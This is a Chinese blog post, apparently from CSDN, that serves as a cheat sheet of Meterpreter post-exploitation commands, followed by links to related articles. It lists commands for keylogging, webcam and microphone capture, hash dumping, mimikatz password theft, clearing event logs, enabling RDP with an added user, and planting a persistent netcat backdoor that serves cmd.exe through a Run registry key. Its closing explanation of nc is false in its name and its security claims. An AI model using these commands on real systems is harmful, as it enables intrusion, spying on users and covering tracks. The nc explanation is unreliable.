meterpreter常用命令

最新推荐文章于 2023-09-16 15:15:54 发布
最新推荐文章于 2023-09-16 15:15:54 发布
阅读量1.5k 收藏 25
点赞数 2
分类专栏: 渗透测试-入门 文章标签: 网络安全 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52421380/article/details/132243913
版权

meterpreter常用命令

1、 meterpreter简介

1.1、什么是meterpreter?

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。
可以使用meterpreter自带的功能实现控制对方手机和电脑。

1.2、 meterpreter常用命令

sessions -i 进入会话
sessions -k 杀死会话
pwd         查看当前目录
getuid      查看当前用户信息
sysinfo     查看远程主机系统信息
execute     在目标主机上执行命令
hashdump    获取目标主机用户密码hash信息(只要我们能够获取到目标的用户凭证,那么即使目标修补了漏洞,我们还是可以控制目标)
getsystem   提升权限(通过内置的提权组件来尝试获取到系统权限)
shell       切换至传统shell
background  将当前session放入后台
kill        关闭进程
load        加载meterpreter扩展
exit        退出当前shell
arp         显示ARP缓存
getproxy    显示当前代理配置
ifconfig    显示接口
ipconfig    显示接口
netstat     显示网络连接
portfwd     将本地端口转发到远程服务
route       查看和修改路由
getenv      查看环境变量
getprivs    查看权限
pgrep       搜索进程
ps          查看当前运行进程(查有没有杀软,可以通过在线杀软对比确定)!!可以查看进程和位数。
reboot      重启系统
reg         修改注册表
help        查看相关的命令
migrate     进程迁移(主要是防止当前的会话断开,所以尽快迁移到其他稳定的进程当中去,要注意两点:迁移的进程位数要一致,迁移的权限最好一致)
clearev     清除windows中的应用程序日志、系统日志、安全日志

2、文件系统命令


cat           查看文件
cd            改变目录
checksum      校验文件md5或sha1
cp            拷贝文件
download      下载文件
edit          编辑文件
ls            列出文件
mkdir         创建文件夹
mv            移动文件
rm            删除文件
rmdir         删除文件夹
search        查找文件
show_mount    列出所有驱动器
upload        上传文件

3、用户设备命令


enumdesktops   列出所有可访问的桌面和窗口
getdesktop     获取当前桌面
idletime       获取远程系统已运行时间(从上次重新启动开始计算)
keyboard_send  发送击键
keyscan_dump   转储击键缓冲区
keyscan_start  开始捕获击键
keyscan_stop   停止捕获击键
mouse          发送鼠标事件
screenshare    实时观看远程用户的桌面
screenshot     截屏
setdesktop     更改shell当前桌面
uictl          控制用户界面组件
record_mic     记录麦克风一定秒数
webcam_chat    开始视频聊天(有可能因为浏览器问题不成功)
webcam_list    列出网络摄像头
webcam_snap    从指定网络摄像头拍摄
webcam_stream  播放指定网络摄像头的视频流
play           在目标系统播放音频

mimikatz抓取密码
load mimikatz   加载mimikatz模块
help mimikatz   查看帮助
wdigest         获取密码

4、开启远程桌面


run vnc 使用vnc连接远程桌面
run getgui -e 开启远程桌面
run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662   将3389端口转发到6662

5、收集信息


run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks   #获取最近的文件操作
run post/windows/gather/enum_ie  #获取IE缓存
run post/windows/gather/enum_chrome   #获取Chrome缓存
run post/windows/gather/enum_patches  #补丁信息
run post/windows/gather/enum_domain  #查找域控

5、针对未安装补丁攻击


run post/windows/gather/enum_patches  收集补丁信息
攻击:
msf > use exploit/windows/local/xxxx
msf > set SESSION 2
msf > exploit

5、注册设置nc后门


upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.159.144 443  #攻击者连接nc后门

6、名词解释

6.1、什么是nc?

nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。它是一种简单的网络连接工具,可以帮助用户在不同的计算机之间传输文件,数据,远程登录,远程执行命令,网络扫描,网络监控,构建VPN等等。
它可以在不同的操作系统之间建立网络连接,而且可以在不同的网络环境之间建立网络连接,比如从本地网络到公用网络。另外,nc也可以被用来实现安全的网络连接,因为它可以使用SSL加密来保护数据传输。SSL加密可以有效地防止黑客窃取用户的数据,从而保护用户的隐私。因此,nc是一个非常有用的网络连接工具,可以为用户提供更安全、高效的网络连接服务。

aimAttack
关注
  • 2
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5554
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 824
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
meterpreter环境下的命令集
12-13
非常值的一个东西,就是你使用msf平台攻进靶机后的meterpreter下的所有命令集都有详细的讲解,非常好
Meterpreter命令详解
weixin_45605352的博客
04-18 4806
0x01初识Meterpreter 1.1.什么是Meterpreter    MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5420
meterpreter使用攻略(持续更新中)
Meterpreter常用命令介绍
自学编程_youkewang.top
11-01 4717
基本命令 1.background:将meterpreter终端隐藏在后台(快捷键ctrl+z) 2.sessions:查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. 3.quit:直接关闭当前的meterpreter会话,返回MSF终端. 4.shell:获取目标系统的控制台shell. 5.irb:在meterpreter会话与ruby
永恒之蓝(ms017-010)漏洞利用
菜鸟-传奇
04-09 1551
永恒之蓝(ms017-010)漏洞利用 1、实验环境 靶机win7 地址:192.168.1.xxx 登录密码:xxxx 攻击机:kaillinux 地址:192.168.1.xxx 登录用户名:root 登录密码:xxx 2、实验原理: “永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。 445端口简介: 445端口是一个毁誉参半的端口,有了它我们可以...
Meterpreter命令合集(详细)
2302_76986722的博客
09-16 1000
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。
Meterpreter常用命令合集
妖魔鬼怪快离开的博客
11-25 9760
getsystem #会自动利用各种各样的系统漏洞来进行权限提升 migrate #进程id进程迁移 background #把当前的会话设置为背景,需要的时候在启用 getuid #查看对方正在运行的用户 ps #列出所有的进程 getpid #返回运行meterpreter的id号 sysinfo #产看系统信息和体系结构 shell #切换到cmd的系统权限方式 e
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
[ MSF ] Meterpreter扩展模块命令详解
79-79.渗透测试-meterpreter介绍.mp4
最新发布
05-10
79-79.渗透测试-meterpreter介绍.mp4
powershell-reverse-http:一个Powershell漏洞利用服务,可通过meterpreter打开反向HTTP连接
05-27
我不鼓励以任何方式非法使用该软件或未经其事先授权而攻击目标类似Meterpreter的后门是一种非常常见的攻击媒介,大多数不错的防病毒软件都将这种行为检测为病毒。 一个在后台运行的简单Windows服务,该服务通过http...
clr-meterpreterMeterpreter的CLR实现的完整故事
02-05
该存储库包含围绕打算在CLR上运行的Meterpreter的新实现的开发而产生的所有杂音和工件。 整个项目都在上进行直播,并在和存档。 有关此项目的基本原理,请参阅我的,并查看下面的第1部分。 这将花费很长时间,并且...
meterpreter会话渗透利用常用的32个命令归纳小结
至臻求学,胸怀云月
01-25 1819
仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考
meterpreter基础命令大全
weixin_30410999的博客
03-08 495
meterpreter meterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用.为后渗透提供了很多便捷之处 基础命令 我们进入meterpreter之后,键入 ? 即可进入帮助文档. 我们进入帮助文档可以看到帮助文档被分成了好几个模块... Core Commands(基础命令) ?              帮助文档 background  ...
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,MeterpreterMetasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。MeterpreterMetasploit 框架的一个扩展模块,可以调用 Metasploit 的
meterpreter命令总结
sweetie 的博客
06-03 2916
前言 MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。 常用命令 sessions -i 进入会话 sessions -k 杀死会话 pwd 查看当前目录 getuid 查看当前用户信息 sysinfo 查看远程主机系统信息 execute
meterpreter
06-06
Meterpreter是一个强大的后渗透框架,是Metasploit渗透测试框架中的一个模块,它提供了一个交互式的命令行接口,可以在受害者计算机上执行各种操作,包括文件系统操作、网络操作、系统管理等。Meterpreter模块可以在多种操作系统上运行,包括Windows、Linux、Mac OS X等。它通常被用来进行后渗透测试,获取受害者计算机的控制权,并执行各种攻击操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值